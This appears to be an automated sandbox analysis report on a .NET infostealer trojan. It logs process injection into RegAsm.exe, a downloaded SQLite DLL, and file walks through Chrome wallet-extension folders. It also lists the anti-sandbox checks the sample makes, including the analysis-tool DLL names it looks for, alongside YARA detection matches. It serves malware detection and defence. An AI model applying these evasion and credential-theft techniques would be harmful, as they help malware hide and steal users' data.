                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 1B491F5A appears 31 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 1B493AF3 appears 37 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 1B6706B1 appears 36 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004170DA appears 98 times
                  Source: file.exeStatic PE information: invalid certificate
                  Source: file.exe, 00000000.00000002.1630251507.0000000000FEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                  Source: file.exe, 00000000.00000000.1628616143.00000000009F8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNETCrypt.exe4 vs file.exe
                  Source: file.exeBinary or memory string: OriginalFilenameNETCrypt.exe4 vs file.exe
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 0.2.file.exe.3d65570.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 0.2.file.exe.3d65570.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/12@1/2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040F310 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,1_2_0040F310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040F711 CoCreateInstance,SysAllocString,SysFreeString,_wtoi64,SysFreeString,SysFreeString,1_2_0040F711
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.logJump to behavior
                  Source: C:\Users\user\Desktop\file.exeMutant created: NULL
                  Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: RegAsm.exe, 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2882085104.0000000015737000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.1.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: RegAsm.exe, 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2882085104.0000000015737000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2882085104.0000000015737000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: RegAsm.exe, 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2882085104.0000000015737000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2882085104.0000000015737000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.1.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                  Source: RegAsm.exe, 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2882085104.0000000015737000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                  Source: RegAsm.exe, 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2882085104.0000000015737000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.1.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                  Source: RegAsm.exe, 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2882085104.0000000015737000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: RegAsm.exe, 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2882085104.0000000015737000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.1.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                  Source: KFIJEG.1.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2882085104.0000000015737000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.1.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                  Source: RegAsm.exe, 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2882085104.0000000015737000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.1.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                  Source: file.exeReversingLabs: Detection: 63%
                  Source: file.exeVirustotal: Detection: 42%
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: NETCrypt.pdb source: file.exe
                  Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2882085104.0000000015737000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.1.dr

                  Data Obfuscation

                  barindex
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: file.exe, gBMthepoZSL1ZVKpeA.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00416676 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00416676
                  Source: sqlx[1].dll.1.drStatic PE information: section name: .00cfg
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00418205 push ecx; ret 1_2_00418218
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B491BF9 push ecx; ret 1_2_1B634C03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4910C8 push ecx; ret 1_2_1B693552
                  Source: file.exeStatic PE information: section name: .text entropy: 7.421157543801175
                  Source: file.exe, eRtoUikQAUlfmrcXhP.csHigh entropy of concatenated method names: 'WKIpT6WRYP', 'GxIp0d0vl2', 'R3Ppdmg34A', 'iAsp1JjQqZ', 'yQwppAuByG', 'BT0pvkDekn', 'ENbpFei3CE', 'YlPUn7XuQH', 'Qsnpc1Onv9', 'jAdpZCXbre'
                  Source: file.exe, gBMthepoZSL1ZVKpeA.csHigh entropy of concatenated method names: 'reTlcDMFua', 'nW4lBacjpc', 'sMLlkdoJ60', 'I5LlJVOMeQ', 'qdll7OAZFb', 'QEmlZSRGOw', 'RegMCu0N1R', 'N15X2cY3J', 'NWNp5BRFs', 'Q59l6jZOT'
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00416676 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00416676
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5816, type: MEMORYSTR
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: RegAsm.exeBinary or memory string: DIR_WATCH.DLL
                  Source: RegAsm.exeBinary or memory string: SBIEDLL.DLL
                  Source: RegAsm.exeBinary or memory string: API_LOG.DLL
                  Source: RegAsm.exe, 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: 2B30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: 2D60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: 2C80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dllJump to dropped file
                  Source: C:\Users\user\Desktop\file.exe TID: 2196Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040ECD4 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0040EDE7h1_2_0040ECD4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040B700 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040B700
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,1_2_00401162
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041531B _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_0041531B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00414462 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,1_2_00414462
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00409531 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_00409531
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040994C _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040994C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00414B2E _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00414B2E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00414ED2 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,1_2_00414ED2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00409FBE _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_00409FBE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004148AF _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,1_2_004148AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040EE70 GetSystemInfo,wsprintfA,1_2_0040EE70
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
